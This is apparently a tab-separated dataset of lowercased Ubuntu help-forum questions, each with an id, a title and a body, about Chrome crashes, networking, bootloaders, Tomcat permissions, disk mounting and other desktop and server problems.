516445	chrome crash when trying to see a youtube video using adobe flash	every time i visit youtube on chrome the page crashes , not just that flash player has crashed message , the whole page crashes and says nothing about what the problem was caused by . i have chrome version 36.0.1985.143 i have ubuntu 14.04 with the latest updates . here is the output of about : flash about flash google chrome 36.0.1985.143 ( ) os linux flash plugin 14.0.0.177 /opt/google/chrome/pepperflash/libpepflashplayer.so -- - crash data -- - crash reporting enable crash reporting to see crash ids for more details https : //support.google.com/chrome/ ? p=ui_usagestat -- - gpu information -- - -- - gpu driver , more information -- - vendor id 0x1002 device id 0x9647 driver vendor mesa driver version 10.1.3 driver date pixel shader version 1.30 vertex shader version 1.30 gl_vendor x.org gl_renderer gallium 0.4 on amd sumo gl_version 3.0 mesa 10.1.3 gl_extensions gl_arb_multisample gl_ext_abgr gl_ext_bgra gl_ext_blend_color gl_ext_blend_minmax gl_ext_blend_subtract gl_ext_copy_texture gl_ext_polygon_offset gl_ext_subtexture gl_ext_texture_object gl_ext_vertex_array gl_ext_compiled_vertex_array gl_ext_texture gl_ext_texture3d gl_ibm_rasterpos_clip gl_arb_point_parameters gl_ext_draw_range_elements gl_ext_packed_pixels gl_ext_point_parameters gl_ext_rescale_normal gl_ext_separate_specular_color gl_ext_texture_edge_clamp gl_sgis_generate_mipmap gl_sgis_texture_border_clamp gl_sgis_texture_edge_clamp gl_sgis_texture_lod gl_arb_framebuffer_srgb gl_arb_multitexture gl_ext_framebuffer_srgb gl_ibm_multimode_draw_arrays gl_ibm_texture_mirrored_repeat gl_arb_texture_cube_map gl_arb_texture_env_add gl_arb_transpose_matrix gl_ext_blend_func_separate gl_ext_fog_coord gl_ext_multi_draw_arrays gl_ext_secondary_color gl_ext_texture_env_add gl_ext_texture_filter_anisotropic gl_ext_texture_lod_bias gl_ingr_blend_func_separate gl_nv_blend_square gl_nv_light_max_exponent gl_nv_texgen_reflection gl_nv_texture_env_combine4 gl_s3_s3tc gl_sun_multi_draw_arrays gl_arb_texture_border_clamp gl_arb_texture_compression gl_ext_framebuffer_object gl_ext_texture_compression_s3tc gl_ext_texture_env_combine gl_ext_texture_env_dot3 gl_mesa_window_pos gl_nv_packed_depth_stencil gl_nv_texture_rectangle gl_arb_depth_texture gl_arb_occlusion_query gl_arb_shadow gl_arb_texture_env_combine gl_arb_texture_env_crossbar gl_arb_texture_env_dot3 gl_arb_texture_mirrored_repeat gl_arb_window_pos gl_ext_stencil_two_side gl_ext_texture_cube_map gl_nv_depth_clamp gl_nv_fog_distance gl_apple_packed_pixels gl_apple_vertex_array_object gl_arb_draw_buffers gl_arb_fragment_program gl_arb_fragment_shader gl_arb_shader_objects gl_arb_vertex_program gl_arb_vertex_shader gl_ati_draw_buffers gl_ati_texture_env_combine3 gl_ati_texture_float gl_ext_shadow_funcs gl_ext_stencil_wrap gl_mesa_pack_invert gl_nv_primitive_restart gl_arb_depth_clamp gl_arb_fragment_program_shadow gl_arb_half_float_pixel gl_arb_occlusion_query2 gl_arb_point_sprite gl_arb_shading_language_100 gl_arb_sync gl_arb_texture_non_power_of_two gl_arb_vertex_buffer_object gl_ati_blend_equation_separate gl_ext_blend_equation_separate gl_oes_read_format gl_arb_color_buffer_float gl_arb_pixel_buffer_object gl_arb_texture_compression_rgtc gl_arb_texture_float gl_arb_texture_rectangle gl_ati_texture_compression_3dc gl_ext_packed_float gl_ext_pixel_buffer_object gl_ext_texture_compression_dxt1 gl_ext_texture_compression_rgtc gl_ext_texture_mirror_clamp gl_ext_texture_rectangle gl_ext_texture_srgb gl_ext_texture_shared_exponent gl_arb_framebuffer_object gl_ext_framebuffer_blit gl_ext_framebuffer_multisample gl_ext_packed_depth_stencil gl_arb_vertex_array_object gl_ati_separate_stencil gl_ati_texture_mirror_once gl_ext_draw_buffers2 gl_ext_draw_instanced gl_ext_gpu_program_parameters gl_ext_texture_array gl_ext_texture_compression_latc gl_ext_texture_integer gl_ext_texture_srgb_decode gl_ext_timer_query gl_oes_egl_image gl_arb_copy_buffer gl_arb_depth_buffer_float gl_arb_draw_instanced gl_arb_half_float_vertex gl_arb_instanced_arrays gl_arb_map_buffer_range gl_arb_texture_rg gl_arb_texture_swizzle gl_arb_vertex_array_bgra gl_ext_texture_swizzle gl_ext_vertex_array_bgra gl_nv_conditional_render gl_amd_conservative_depth gl_amd_draw_buffers_blend gl_amd_seamless_cubemap_per_texture gl_amd_shader_stencil_export gl_arb_es2_compatibility gl_arb_blend_func_extended gl_arb_debug_output gl_arb_draw_buffers_blend gl_arb_draw_elements_base_vertex gl_arb_explicit_attrib_location gl_arb_fragment_coord_conventions gl_arb_provoking_vertex gl_arb_sampler_objects gl_arb_seamless_cube_map gl_arb_shader_stencil_export gl_arb_shader_texture_lod gl_arb_texture_cube_map_array gl_arb_texture_multisample gl_arb_texture_rgb10_a2ui gl_arb_uniform_buffer_object gl_arb_vertex_type_2_10_10_10_rev gl_ext_provoking_vertex gl_ext_texture_snorm gl_mesa_texture_signed_rgba gl_nv_texture_barrier gl_arb_get_program_binary gl_arb_robustness gl_arb_shader_bit_encoding gl_arb_timer_query gl_arb_transform_feedback2 gl_arb_transform_feedback3 gl_nv_vdpau_interop gl_angle_texture_compression_dxt3 gl_angle_texture_compression_dxt5 gl_arb_base_instance gl_arb_conservative_depth gl_arb_internalformat_query gl_arb_map_buffer_alignment gl_arb_shading_language_420pack gl_arb_shading_language_packing gl_arb_texture_storage gl_arb_transform_feedback_instanced gl_ext_framebuffer_multisample_blit_scaled gl_ext_transform_feedback gl_amd_shader_trinary_minmax gl_arb_clear_buffer_object gl_arb_invalidate_subdata gl_arb_texture_storage_multisample gl_arb_vertex_attrib_binding gl_khr_debug gl_arb_texture_mirror_clamp_to_edge gl_arb_vertex_type_10f_11f_11f_rev
516446	dell xps 15-9530 running ubuntu 14.04	i plan on getting myself a new laptop with a top-notch display . the latest dell xps 15 seems to have a reasonable price for what it comes with . my only question is whether it runs with ubuntu 14.04 just fine or if certain things fail to work . all the reviews i found are outdated . also , if you have another alternative for a laptop that 's capable of running latest ubuntu just fine give it a go : ) i need : - i7 latest generation - 8-16gb ram - no onboard gfx - high-resolution display ( ~retina-like ) - 3+ usb 3.0 ports - good battery life - 14 '' -15.6 '' thank you all in advance .
516452	openstack : conifgure vm with static ip on eth1	i 'm trying to create two trusty vms with static ips for eth1 , but pings between the static addresses fail . via havana dashboard , i created a network with a 10.16.1/24 subnet , disabled gateway , enabled dhcp with range 10.16.1.100,10.16.1.120 . launched 4 instances , each with two nics ; eth0 for my regular public interface , and eth1 for the 10.16.1/24 subnet . logged into two of the vm and created eth1.cfg , configured for dhcp auto eth1 iface eth1 inet dhcp logged into the other two vm and created eth1.cfg , configured with static information auto eth1 iface eth1 inet static address 10.16.1.2 netmask 255.255.255.0 ifup eth1 on each vm from each dhcp configured vm , i can ping the other dhcp configured vm , but not the statically configured vms . from the statically configured vms , i can ping no other vm . i also tried creating a router for the network , and adding an interface 10.16.1.254 . but this made no apparent change . i also can not ping the router from either vm . what am i missing ?
516455	changing order of interfaces	hoping someone can help me , what i 'm wanting to do is change the order of my interfaces on ubuntu 12.04lts . we 're running our ubuntu server on a vmware box with three virtual interfaces . i 've read through all the links on how to control the up order of network interfaces ? but it does n't seem to offer what we 're looking for . we have a slight issue in that a piece of software we are running uses the first interface it finds as it 's control interface . we actually need it to use the third one . we 've checked with the vendor and they 've confirmed we ca n't configure the software to specify which interface . that is a rant for a different time though . at current an ifconfig looks something like this : eth0 link encap : ethernet hwaddr 00:0c:29 : b5 : dd : c1 inet addr:192.168.10.117 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : feb5 : ddc1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:1368 ( 1.3 kb ) eth1 link encap : ethernet hwaddr 00:0c:29 : b5 : dd : cb inet addr:192.168.20.117 bcast:192.168.20.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : feb5 : ddcb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:660 ( 660.0 b ) tx bytes:468 ( 468.0 b ) eth2 link encap : ethernet hwaddr 00:0c:29 : b5 : dd : d5 inet addr:192.168.30.117 bcast:192.168.30.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : feb5 : ddd5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:540 ( 540.0 b ) tx bytes:468 ( 468.0 b ) we ideally want what is now eth2 with a mac of 00:0c:29 : b5 : dd : d5 to be eth0 . when we change /etc/network/interfaces accordingly we get a change , but not right : eth0 link encap : ethernet hwaddr 00:0c:29 : b5 : dd : c1 inet addr:192.168.30.117 bcast:192.168.30.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : feb5 : ddc1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5 errors:0 dropped:0 overruns:0 frame:0 tx packets:25 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:526 ( 526.0 b ) tx bytes:1666 ( 1.6 kb ) eth1 link encap : ethernet hwaddr 00:0c:29 : b5 : dd : cb inet addr:192.168.20.117 bcast:192.168.20.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : feb5 : ddcb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:17 errors:0 dropped:0 overruns:0 frame:0 tx packets:9 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1246 ( 1.2 kb ) tx bytes:706 ( 706.0 b ) eth2 link encap : ethernet hwaddr 00:0c:29 : b5 : dd : d5 inet addr:192.168.10.117 bcast:192.168.10.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : feb5 : ddd5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:13 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:946 ( 946.0 b ) tx bytes:946 ( 946.0 b ) can anyone think of a way to change the order of the interfaces ? we 're confident it could be done through vmware but in an ideal world it would be great if it could be done without rebooting the server . i could be asking the wrong question here , or asking it the wrong way . any pointers would be hugely appreciated !
516456	synaptic freezes at start	this is a fresh install of ubuntu 14.04 , using gnome flashback mode . synaptic made problems from the beginning , directly after its installation . ubuntu 12.04 , which is installed in parallel , never had problems with synaptic . after starting synaptic , the left list is populated while the loading bar is displayed at the bottom . after the loading bar disappears , nothing changes ( still not enabled/ '' clickable '' ) and after a while the synaptic window becomes grey . one cpu is at 100 % load then with the synaptic process . then i have to kill it and remove the /var/lib/dpkg/lock file prior to being able to use apt or the software center . those other two tools work without a problem . interesting : sometimes synaptic works ! i can not identify why . i have no clue on how to debug or solve this . there is nothing in syslog and no error when called via command line . as requested , some hardware informations : samsung xe700t slate pc ( tablet style ) intel core i5 2467m 4 gb ram 64 gb ssd
516458	what does dpkg -- configure -a do ?	the title explains it , but why should have to use it when i am installing a package via terminal on my box then the installation fails , why is this and what does `` dpkg -- configure -a '' do to fix it that the ordinary `` sudo apt '' can not do ?
516459	custom live cd using uck boot to ram	i am trying to create a custom live iso that automatically boots to ram on startup . so i need the iso i create in uck to setup toram each time i burn it to a disc or install it on a flash drive . thank you
516464	is there anything that ext4 . btrfs , or f2fs can do for a usb3.0 thumb drive that fat does not do ?	i do n't particularly care about cross platform . i have a thumb drive , and what to know if there is anything to gain from formatting it to ext4 , btrfs , or f2fs . thanks
516465	chrome/chromium causes laggy touchpad on lubuntu 14.04 at macbook	i 'm running lubuntu at quite an old macbook ( 6.1 ) . trying to keep it up-to-date so for the moment it 's 14.04 . several months ago ( after one of the updates ) a strange problem arose : at a random moment of time touchpad becomes veeeery laggy so there 's absolutely no way you can continue working - the only thing to help is a reboot . at the same time there 's no extra cpu usage or anything extraordinary i 've noticed . spent long time looking for a clues but all i 've found is that the problem appears only when google chrome is open . turned off chrome extension i 've used - still there . found somewhere that reinstalling ibus could fix the problem , but it did n't . tried to use chromium instead of chrome - no help ( strange if it were though ) . while switched chrome to chromium noticed that until pepperflash installation ( since there 's no flash support in the latest version ) chromium did n't raise the problem , but i 've use it without plugin for quite a short time so it might just be my luck ( unluck ? ) ... so could you please guide me in this challenge ? i would appreciate any ideas on where to start looking ...
516466	permission issues with tomcat	i installed tomcat 7 following the ubuntu guide . the server is working and gives me the `` it works ! '' page on http : //localhost:8080/ . now i want to setup my own webapp using netbeans . i generated a new web project with java ee 6 and tomcat 7 . the user is on the /var/lib/tomcat7/conf/tomcat-users.xml file properly configured . when i run the project everything seems ok , but when i open the browser it displays a 500 error . the tomcat output mentions permission errors trying to access tomcat7/logs and the ide logs trying to access tomcat7/conf . files permissions : ( edited ) lucio @ lucio-pc : / $ ll /var/lib/tomcat7/logs lrwxrwxrwx 1 root root 17 jul 24 18:07 /var/lib/tomcat7/logs - > ../../log/tomcat7/ lucio @ lucio-pc : / $ ll /var/log/tomcat7/ total 136 drwxr-x -- - 2 tomcat7 adm 4096 ago 28 10:50 ./ drwxrwxr-x 15 root syslog 4096 ago 28 09:29 ../ -rw-r -- r -- 1 tomcat7 tomcat7 800 ago 26 17:23 catalina.2014-08-26.log.gz -rw-r -- r -- 1 tomcat7 tomcat7 5173 ago 27 21:59 catalina.2014-08-27.log -rw-r -- r -- 1 tomcat7 tomcat7 31285 ago 28 10:36 catalina.2014-08-28.log -rw-r -- r -- 1 tomcat7 root 44192 ago 28 10:36 catalina.out -rw-r -- r -- 1 tomcat7 tomcat7 45 ago 26 16:19 localhost.2014-08-26.log.gz -rw-r -- r -- 1 tomcat7 tomcat7 0 ago 27 11:15 localhost.2014-08-27.log -rw-r -- r -- 1 tomcat7 tomcat7 433 ago 28 09:49 localhost.2014-08-28.log -rw-r -- r -- 1 tomcat7 tomcat7 7435 ago 26 17:23 localhost_access_log.2014-08-26.txt -rw-r -- r -- 1 tomcat7 tomcat7 0 ago 27 11:15 localhost_access_log.2014-08-27.txt -rw-r -- r -- 1 tomcat7 tomcat7 15186 ago 28 09:58 localhost_access_log.2014-08-28.txt i do n't understand why ca n't access the files , you can see that the user and group tomcat7 has permissions to the files . is there a user for the jvm that needs privileges over the files ? i also tried changing files ownerships as mentioned here but it does n't change at all . the /etc/default/tomcat7 file has : tomcat7_user=tomcat7 tomcat7_group=tomcat7 so i guess it is running as tomcat7 user . i added my user into the tomcat7 group : sudo usermod -ag tomcat7 $ user and then restarted the machine , but the problem persist .
516470	efi boot loader problem for dualboot system with windows 8.1	i succesfully installed ubuntu 14.04 manually alongside windows 8.1 on my lenovo thinkpad yoga . however i did not manage to fix the booting process . so here is what i tried so far : using `` efibootmgr '' i am able to find an boot entry which is `` ubuntu '' using `` efibootmgr -n `` and the appropriate boot entry for ubuntu restarting leads to the grub2 menu where i can select my ubuntu installation . however this works only once . using `` efibootmgr -o `` to change the boot order changes the order according , however the system directly boots windows and when checking the boot order the entries are as before the changes using `` efibootmgr `` to deactivate the windows boot loader entry does also not work changing the boot path with `` bcdedit '' from within windows did not change anything my guess is now that the firmware is constantly overwriting the boot order if windows boot loader is not the first entry . i hope that someone has some idea how to fix that .
516473	ram usage in chrome	i run quite a few windows and tabs open is chrome on a regular basis and while on ubuntu it seems to seriously bog my system down . 4gb ram and 4gb swap . this laptop is dual booted with windows 8.1 and i can run twice the amount of chrome tabs and windows with half the lag when in windows 8.1 than i can while booted into ubuntu 14.04 . this makes me believe there is a setting out of place somewhere , because i find it hard to believe the difference in memory management between the two os 's is so significant . any ideas ? ubuntu 2 windows 200 tabs and system lags to the point that it is basically frozen 8.1 4 windows 400 tabs while streaming a video and moderate lag what could i have set up incorrectly ?
516475	autostart script on login in lubuntu	i want to run this command on login under lubuntu : cd /home/myuser/kippo & & bash start.sh it 's supposed to launch kippo , an ssh honeypot . the command works fine if i run it at the terminal . but how can i get it to launch on startup ? ( my user is set to autologin already , and i got vino to start under the lxsession autostart screen , but i ca n't get kippo to work the same way ... ) .
516476	regaining access to old external hdd ( exfat/mac & win , maybe ) , unallocated maybe toasted hdd	first off , i 'm new to ubuntu , and do not speak really comprehend too much of computer literacy . and english is not my main language . so ... i have and old hdd from a friend , that she wants to regain access to after her cat might 've dropped it and stoped working , at least on her mac . she thinks hdd was first formated as exfat to access both mac/win , but not entirely sure . i 'm running a livecd for ubuntu13 , and after pluging the external hdd from a usb port ( sata ) , the disk spins , sounds fine , and vibrates , telling me that it might actually be possible to regain access , and the option of proffesional and expensive help opening it vacuum is not neccesary . on fdisk -l it shows as follows : disk /dev/sdh : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x2ef796f3 disk /dev/sdh does n't contain a valid partition table . on gparted shows as unallocated , and it seems to be practically impossible for me to get it to mount . its a 3tb western digital external hard drive . please , my friend has her entire life on that hdd ( her fault , i know ) , but any help would be greatly appreciated . and please do n't be rude ; remeber , `` it 's just a ride '' . thanks , and great day !
516480	i 'm trying to get started with lxc containers , and i 'm getting a permissions problem on starting an unpriviledged container . how can i fix it ?	i 'm getting a permissions problem on starting an unpriviledged container . how can i fix it ?
516483	texlive problems after upgrade to 14.04 from 12.04	during upgrade from 12.04 to 14.04 i got lots of errors about various items related to tex . most of them reported 'tex-common is not configured ' as at least a part of the problem . when i try to reinstall tex-common , i get the error : no file name for tex-common : i386 other side effects of this problem are that i can no longer start eclipse , and as you would expect kile and other applications that manipulate latex do n't work any more . any help would be much appreciated .
516485	i have no idea what 's going on . : (	*please note that my phone is the only way i can connect to the internet right now . since my pc is having an error which will be explained below . **i might be able to borrow my friend 's laptop if i need to download some files . i installed ubuntu 14.04.1 lts alongside win7 with a cd . i have 2 tb on my c drive which i partitioned 500 gb for ubuntu . i was ask to restart to complete the installation which worked well . i was looking at the desktop when i noticed i do n't have a network connection . so i tried to check but it does n't detect any wifi networks , even my neigbhor 's . then what i did was reboot the computer so i can look up for a solution online using win 7 . but all i see was `` device not found ( or something similar ) insert a long line of numbers here '' then followed by : '' entering rescue mode '' '' grub rescue : '' so using my phone , ( as it is the only way i can get to the internet aside from my pc ) i found about the ls commands . but it 's useless since every ( hdx , y ) i have displays the unknown filesystem error . i also ca n't boot any cd or usb because i think my bios is gone . these are all the details i can remember as i sit here on the toilet contemplating about the future of the universe .
516487	which distro to avoid amazon ?	there are a couple of threads already on how to disable ads on ubuntu ( amazon ) , i understand it ... but i do n't agree with it . there are a few things about ubuntu that i like though . its community for one , the installer for another and most developing companies ( like steam ) are creating their software on ubuntu platforms because they 'll reach the most people and i 've been using ubuntu for the last decade . it 's the os i 'm just most familiar with . so ... my question is , is amazon that comes bundled with ubuntu standard installs , is that inherent to all ubuntu derivatives ( like e.g . mint , xubuntu , etc ) , or is it just related to the ubuntu desktop version ? i am going to switch to something else , prefer to stay with something from ubuntu under the hood , i want a bit of bleeding edge but not to the point where it can seriously become unstable ( like arch if you do n't know what you 're doing ) . i would n't shun another base ( e.g . redhat ) but preferably not . any recommendations and elaborations on the subject ? much appreciated ; )
516489	ubuntu stuck on as a uefi entry after doing efibootmgr	i have a asus x550ca and i have dual booted it with windows . the problem is that i deleted the ubuntu partition and swap because i found ubuntu to be useless to me and there is a ubuntu entry in my bios which is really disturbing and i want to get rid of it . i already tried efibootmgr but that did n't do much . there is a delete option on my bios to delete any unwanted entry 's . however that did n't work since it pops up again right after i save and exit . how do i fix this so only windows is there ? also i managed to get a peek inside the uefi partition and there is a ubuntu folder in the efi folder .
516494	how can i speed up finding available wifi networks ?	i 'm using unity with ubuntu 14.04 , and there 's no manual refresh button for wifi networks that i can find . so when i click on the wifi icon in the upper right , i just have to wait for it to get around to showing me new networks ( this is most frustrating when i 've just turned on my 4g hot spot ) . sometimes i have to wait 15+ seconds to see my hotspot even though my phone and tablet can already see it ( so i know the network is available well before ubuntu sees it ) . is there any way to get a `` refresh '' option added to the wifi options in the network drop down list , or to decrease the time between scans for open networks ?
516496	ubuntu/gparted wo n't show all my hard drive capacity	my asus laptop 's main , internal hard drive has a total 621.4 gb of space , however , gparted is only showing a total of 332.06 gb of total data space among my partitions . its pretty much telling me that i lost 289.34 gb somewhere . when i made the switch to ubuntu , it was a full switch , no more old os , so i do n't know where that 290 went off to . the only thing i know that might help , is that this rog asus had some sort of quick start , very basic os on it , along with standard windows , but i could have sworn i have gotten rid of that feature all together . truthfully , i do n't know if the 621.4 gb included that os or not . i 'd really like to know what happened to my vanishing 289.34 gb , and would love to get it back . thank you . edit : here are some screen shots . note , i was in the middle of setting up a dual boot with windows , but the windows disk told me that i needed to make a new partition . hence why i went to gparted in the first place . system details : gparted info for the standard ubuntu partition : gparted info for a small partition that the windows disk created : for another source on how big my harddrive is , its an asus rog g51vx : http : //www.asus.com/notebooks_ultrabooks/g51vx/specifications/ here is the output of sudo fdisk -l : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d11a5 device boot start end blocks id system /dev/sda1 * 2048 616753151 308375552 83 linux /dev/sda2 616755198 625141759 4193281 5 extended /dev/sda5 616755200 625141759 4193280 82 linux swap / solaris here is the output of sudo parted -l : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d11a5 device boot start end blocks id system /dev/sda1 * 2048 616753151 308375552 83 linux /dev/sda2 616755198 625141759 4193281 5 extended /dev/sda5 616755200 625141759 4193280 82 linux swap / solaris here is the output of sudo lshw -c disk : `*-disk description : ata disk product : st9320421as vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : sd14 serial : 5tj0vt78 size : 298gib ( 320gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=000d11a5 *-cdrom description : dvd-ram writer product : dvdram gsa-t50n vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 version : rr07 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc
516497	update-manager -d question	i found the following command sequence in an older linux/ubuntu 'bible'published in 2006 : sudo apt-get update sudo apt-get dist-upgrade question : i 'm curious - does update-manager -d accomplish the same purpose as the commands i found in the older book ? by way of introduction , i 'm a new linux/ubuntu enthusiast , running ubuntu 14.04. fascinating ! thanks in advance for your help .
516500	ubuntu server asus chromebox wo n't boot unless i have a hdmi display plugged in	so i installed ubuntu server on my asus chromebox , all works great except i have a strange issue . ubuntu wo n't boot unless i have a hdmi display plugged in i 've tested this over and over . if i plug in the hdmi display it boots and runs as expected , but since i wanted to run this as a server and ssh into the box , not if wont boot . is there a check i need to uncheck for the hdmi display ? note : i have command line access only , no gui edit : here is the installation process i 'm following https : //plus.google.com/115693545287597955633/posts/qsee96rljvv
516504	wifi and ethernet networking stopped working in ubuntu 14.04	i have a system76 kudu professional version kudp1 , it came with ubuntu 13.10 but i upgraded it to 14.04 . after the last upgrade i did it stopped detecting ethernet and wifi networks . nm-tool output : networkmanager tool state : disconnected sudo lshw -c network output : *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7d00000-f7d01fff *-network unclaimed description : ethernet controller product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:05:00.2 version : 0a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : latency=0 resources : ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff iwconfig output : lo no wireless extensions . nmcli nm output : running state wifi-hardware wifi wwan-hardware wwan running disconnected enabled enabled enabled enabled thanks in advance to anyone that takes a look at this issue i have .
516506	a bit of a keyboard problem	so i 've looked all over but i ca n't seem to find a solution anywhere nor can i find a problem exactly like mine so maybe someone can help me . i want to be very specific just in case i did something wrong so bear with me . i have a toshiba satellite laptop that 's about 2 years old now and am relatively new to linux , so naturally i started with ubuntu and my keyboard worked fine . however i started looking into other distros because there are so many to decide on . i installed zorin os 9 by usb and proceeded to check out it 's features but while i was playing one of its pre-installed games my internal keyboard seemed to stop working . after numerous failures to get my keyboard running again by rebooting i installed ( and am currently running ) kubuntu with a complete wipe of my drive . still my keyboard is not responding sometimes . i say sometimes because sometimes after rebooting maybe 8-9 times my computer decides to recognize my internal keyboard which is very odd to me . currently it is working fine but when i reboot it wo n't work again . the same keyboard problem occurs in recovery mode . it 's also worth noting that when i enter my bios password my keyboard functions just fine , its not until the os starts loading when my caps lock and num lock turn off and my keyboard is rendered useless . usb keyboards work fine . solutions i 've tried so far are that do n't seem to work : changing text at /etc/default/grub from grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash i8042.nopnp=1 i8042.dumbkbd=1 '' and rebooting changing my input method to various things including removing an input method and rebooting adding another language and rebooting if you need any info that i have n't stated here let me know and i will do my best to tell you . and if i am a duplicate post could you please link me to a solution ! thank you !
516507	software updater error message `` can not read '/dev/sdc ' input/output error	i am new to linux and have installed lubuntu 14.04 on eee pc 900 . all seems to work ok , except software updater seems to be hanging on : '' configuring linux-image-3.13.0-34generic '' with message '' error can not read '/dev/sdc/ ' input/output error '' could someone please advise how i remedy .
516509	a2dp bluetooth problem on 14.04	i have a pair of bose ae2w headphones that initially connect fine with bluetooth on 14.04 . i can select the headphones and choose a2dp output , and everything works . if the connection times out due to inactivity or from hibernation , and i reactivate the headphones , the bluetooth connection is re-established , but a2dp does not work only hsp . any suggestions on how to fix this problem ?
516510	1 ssd windows , 1 ssd ext4 , 1 ntfs data mutual drive ?	i am trying to use a mutual data hard drive ( ntfs ) to run my files between both windows and linux . i am new to linux and having trouble with identifying the 3rd hd , which is ntfs . on the sidebar , the gui shows the drive i am looking to mount and eventually set up a write ability to , called data i tried : sudo su fdisk -l only one result comes up : /dev/sdc1 this surprised me , so i tried this website 's instructions https : //support.plex.tv/hc/en-us/articles/200288606-mounting-ntfs-drives-on-linux i was surprised , as when i followed this to the blkid command , i did not receive a list of uuids that were 32 characters , as i was expecting . it returned a 16 character sequence . root @ hoss : / # blkid|grep -i ntfs|sed 's/ . *uuid= '' //g'|cut -d '' \ '' '' -f1|awk ' { print `` uuid= '' $ ! '' /media/ntfsdrive ntfs-3g permissions , auto 0 0 '' } ' uuid=0c86ba8986ba72b6 uuid=5a58c0ec58c0c7c9 uuid=f050cabe50ca8b34 i then did : ls -l /dev/disk/by-uuid and found the various drives , all of them i remember setting up . i next tried querying each /dev/sd* to find which drive was the ntfs data hard drive , which it turns out was sdc1 , but again returned the same 16 code uuid : jamie @ hoss : /dev $ blkid /dev/sdc1 /dev/sdc1 : label= '' data '' uuid= '' f050cabe50ca8b34 '' type= '' ntfs '' i then tried a basic read mounting of ntfs as found on documentation here ( http : //ubuntuguide.org/wiki/dapper # windows ) and received this root @ hoss : / # sudo mount /dev/hdc1 /media/data/ -t ntfs -o nls=utf8 , umask=0222 ntfs-3g : failed to access volume '/dev/hdc1 ' : no such file or directory ntfs-3g 2013.1.13ar.1 external fuse 29 - third generation ntfs driver configuration type 7 , xattrs are on , posix acls are on copyright ( c ) 2005-2007 yura pakhuchiy copyright ( c ) 2006-2009 szabolcs szakacsits copyright ( c ) 2007-2012 jean-pierre andre copyright ( c ) 2009 erik larsson usage : ntfs-3g [ -o option [ , ... ] ] < device|image_file > < mount_point > options : ro ( read-only mount ) , windows_names , uid= , gid= , umask= , fmask= , dmask= , streams_interface= . please see the details in the manual ( type : man ntfs-3g ) . example : ntfs-3g /dev/sda1 /mnt/windows news , support and information : http : //tuxera.com so i am now stuck , and my question is , where would you go from here , to try and have a mutual hard drive in ntfs between linux and windows ? sorry for the long post , and thanks for taking the time to read this . edit 1 thanks to muru ( in the comments ) i noticed that i entered in a spelling mistake ( trying to mount hdc , not sdc ) i went back and repeated the steps with the correct spelling , this is what it said : jamie @ hoss : ~ $ sudo mount /dev/sdc1 /media/data/ -t ntfs -o nls=utf8 , umask=0222 the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdc1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i am not looking for a 'read only ' , i also want to be able to write , but i am not sure what metadata is kept in windows cache . is it possible the bootloader that enables me to choose between windows and linux on boot is causing this , or does recognize this and know a solution ? thanks in advance !
